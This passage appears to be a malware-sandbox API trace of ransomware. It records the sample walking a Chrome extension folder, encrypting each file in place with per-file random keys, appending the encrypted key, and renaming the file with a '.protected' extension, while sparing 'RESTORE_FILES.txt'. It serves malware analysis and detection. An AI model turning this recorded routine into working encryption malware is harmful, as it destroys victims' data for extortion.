(in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0080.277] lstrcmpiW (lpString1="128.png", lpString2="Windows") returned -1 [0080.277] lstrcmpiW (lpString1="128.png", lpString2="Program Files") returned -1 [0080.277] lstrcmpiW (lpString1="128.png", lpString2="Program Files (x86)") returned -1 [0080.277] lstrcmpiW (lpString1="128.png", lpString2="$Recycle.bin") returned 1 [0080.277] lstrcmpiW (lpString1="128.png", lpString2="System Volume Information") returned -1 [0080.277] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\128.png") returned 137 [0080.277] StrStrIW (lpFirst="128.png", lpSrch=".protected") returned 0x0 [0080.277] lstrcmpW (lpString1="128.png", lpString2="RESTORE_FILES.txt") returned -1 [0080.277] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0080.277] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0080.277] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\128.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\128.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0080.278] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\128.png") returned 137 [0080.278] StrStrW (lpFirst="128.png", lpSrch=".txt") returned 0x0 [0080.278] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\128.png") returned 137 [0080.278] StrStrW (lpFirst="128.png", lpSrch=".rar") returned 0x0 [0080.278] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\128.png") returned 137 [0080.278] StrStrW (lpFirst="128.png", lpSrch=".zip") returned 0x0 [0080.278] ReadFile (in: hFile=0x160, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ddf4*=0x1378, lpOverlapped=0x0) returned 1 [0080.279] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xffffec88, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.280] WriteFile (in: hFile=0x160, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x1378, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ddf4*=0x1378, lpOverlapped=0x0) returned 1 [0080.280] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.280] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0080.280] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0080.280] CloseHandle (hObject=0x160) returned 1 [0080.281] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\128.png.protected") returned 147 [0080.281] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\128.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\128.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\128.png.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\128.png.protected")) returned 1 [0080.281] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0080.282] lstrcmpiW (lpString1="contentscript_bin_prod.js", lpString2="Windows") returned -1 [0080.282] lstrcmpiW (lpString1="contentscript_bin_prod.js", lpString2="Program Files") returned -1 [0080.282] lstrcmpiW (lpString1="contentscript_bin_prod.js", lpString2="Program Files (x86)") returned -1 [0080.282] lstrcmpiW (lpString1="contentscript_bin_prod.js", lpString2="$Recycle.bin") returned 1 [0080.282] lstrcmpiW (lpString1="contentscript_bin_prod.js", lpString2="System Volume Information") returned -1 [0080.282] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\contentscript_bin_prod.js") returned 155 [0080.282] StrStrIW (lpFirst="contentscript_bin_prod.js", lpSrch=".protected") returned 0x0 [0080.282] lstrcmpW (lpString1="contentscript_bin_prod.js", lpString2="RESTORE_FILES.txt") returned -1 [0080.282] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0080.282] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0080.282] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\contentscript_bin_prod.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\contentscript_bin_prod.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0080.283] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\contentscript_bin_prod.js") returned 155 [0080.283] StrStrW (lpFirst="contentscript_bin_prod.js", lpSrch=".txt") returned 0x0 [0080.283] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\contentscript_bin_prod.js") returned 155 [0080.283] StrStrW (lpFirst="contentscript_bin_prod.js", lpSrch=".rar") returned 0x0 [0080.283] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\contentscript_bin_prod.js") returned 155 [0080.283] StrStrW (lpFirst="contentscript_bin_prod.js", lpSrch=".zip") returned 0x0 [0080.283] ReadFile (in: hFile=0x160, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ddf4*=0x1103, lpOverlapped=0x0) returned 1 [0080.292] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xffffeefd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.292] WriteFile (in: hFile=0x160, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x1103, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ddf4*=0x1103, lpOverlapped=0x0) returned 1 [0080.292] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.292] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0080.293] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0080.293] CloseHandle (hObject=0x160) returned 1 [0080.293] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\contentscript_bin_prod.js.protected") returned 165 [0080.293] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\contentscript_bin_prod.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\contentscript_bin_prod.js"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\contentscript_bin_prod.js.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\contentscript_bin_prod.js.protected")) returned 1 [0080.294] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0080.294] lstrcmpiW (lpString1="dasherSettingSchema.json", lpString2="Windows") returned -1 [0080.294] lstrcmpiW (lpString1="dasherSettingSchema.json", lpString2="Program Files") returned -1 [0080.294] lstrcmpiW (lpString1="dasherSettingSchema.json", lpString2="Program Files (x86)") returned -1 [0080.294] lstrcmpiW (lpString1="dasherSettingSchema.json", lpString2="$Recycle.bin") returned 1 [0080.294] lstrcmpiW (lpString1="dasherSettingSchema.json", lpString2="System Volume Information") returned -1 [0080.294] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\dasherSettingSchema.json") returned 154 [0080.294] StrStrIW (lpFirst="dasherSettingSchema.json", lpSrch=".protected") returned 0x0 [0080.294] lstrcmpW (lpString1="dasherSettingSchema.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.294] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0080.294] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0080.294] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\dasherSettingSchema.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\dashersettingschema.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0080.294] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\dasherSettingSchema.json") returned 154 [0080.295] StrStrW (lpFirst="dasherSettingSchema.json", lpSrch=".txt") returned 0x0 [0080.295] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\dasherSettingSchema.json") returned 154 [0080.295] StrStrW (lpFirst="dasherSettingSchema.json", lpSrch=".rar") returned 0x0 [0080.295] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\dasherSettingSchema.json") returned 154 [0080.295] StrStrW (lpFirst="dasherSettingSchema.json", lpSrch=".zip") returned 0x0 [0080.295] ReadFile (in: hFile=0x160, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ddf4*=0x356, lpOverlapped=0x0) returned 1 [0080.296] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xfffffcaa, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.296] WriteFile (in: hFile=0x160, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x356, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ddf4*=0x356, lpOverlapped=0x0) returned 1 [0080.297] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.297] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0080.297] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0080.297] CloseHandle (hObject=0x160) returned 1 [0080.297] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\dasherSettingSchema.json.protected") returned 164 [0080.297] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\dasherSettingSchema.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\dashersettingschema.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\dasherSettingSchema.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\dashersettingschema.json.protected")) returned 1 [0080.298] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0080.298] lstrcmpiW (lpString1="eventpage_bin_prod.js", lpString2="Windows") returned -1 [0080.298] lstrcmpiW (lpString1="eventpage_bin_prod.js", lpString2="Program Files") returned -1 [0080.298] lstrcmpiW (lpString1="eventpage_bin_prod.js", lpString2="Program Files (x86)") returned -1 [0080.298] lstrcmpiW (lpString1="eventpage_bin_prod.js", lpString2="$Recycle.bin") returned 1 [0080.298] lstrcmpiW (lpString1="eventpage_bin_prod.js", lpString2="System Volume Information") returned -1 [0080.298] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\eventpage_bin_prod.js") returned 151 [0080.298] StrStrIW (lpFirst="eventpage_bin_prod.js", lpSrch=".protected") returned 0x0 [0080.298] lstrcmpW (lpString1="eventpage_bin_prod.js", lpString2="RESTORE_FILES.txt") returned -1 [0080.298] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0080.298] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0080.298] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\eventpage_bin_prod.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\eventpage_bin_prod.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0080.299] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\eventpage_bin_prod.js") returned 151 [0080.299] StrStrW (lpFirst="eventpage_bin_prod.js", lpSrch=".txt") returned 0x0 [0080.299] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\eventpage_bin_prod.js") returned 151 [0080.299] StrStrW (lpFirst="eventpage_bin_prod.js", lpSrch=".rar") returned 0x0 [0080.299] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\eventpage_bin_prod.js") returned 151 [0080.299] StrStrW (lpFirst="eventpage_bin_prod.js", lpSrch=".zip") returned 0x0 [0080.299] ReadFile (in: hFile=0x160, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0080.301] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.301] WriteFile (in: hFile=0x160, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0080.301] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.301] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0080.302] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0080.302] CloseHandle (hObject=0x160) returned 1 [0080.302] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\eventpage_bin_prod.js.protected") returned 161 [0080.302] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\eventpage_bin_prod.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\eventpage_bin_prod.js"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\eventpage_bin_prod.js.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\eventpage_bin_prod.js.protected")) returned 1 [0080.303] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0080.303] lstrcmpiW (lpString1="manifest.json", lpString2="Windows") returned -1 [0080.303] lstrcmpiW (lpString1="manifest.json", lpString2="Program Files") returned -1 [0080.303] lstrcmpiW (lpString1="manifest.json", lpString2="Program Files (x86)") returned -1 [0080.303] lstrcmpiW (lpString1="manifest.json", lpString2="$Recycle.bin") returned 1 [0080.303] lstrcmpiW (lpString1="manifest.json", lpString2="System Volume Information") returned -1 [0080.303] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\manifest.json") returned 143 [0080.303] StrStrIW (lpFirst="manifest.json", lpSrch=".protected") returned 0x0 [0080.303] lstrcmpW (lpString1="manifest.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.303] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0080.303] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0080.303] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\manifest.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0080.304] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\manifest.json") returned 143 [0080.304] StrStrW (lpFirst="manifest.json", lpSrch=".txt") returned 0x0 [0080.304] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\manifest.json") returned 143 [0080.304] StrStrW (lpFirst="manifest.json", lpSrch=".rar") returned 0x0 [0080.304] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\manifest.json") returned 143 [0080.304] StrStrW (lpFirst="manifest.json", lpSrch=".zip") returned 0x0 [0080.304] ReadFile (in: hFile=0x160, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ddf4*=0x5b1, lpOverlapped=0x0) returned 1 [0080.305] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xfffffa4f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.306] WriteFile (in: hFile=0x160, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x5b1, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ddf4*=0x5b1, lpOverlapped=0x0) returned 1 [0080.306] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.306] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0080.306] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0080.306] CloseHandle (hObject=0x160) 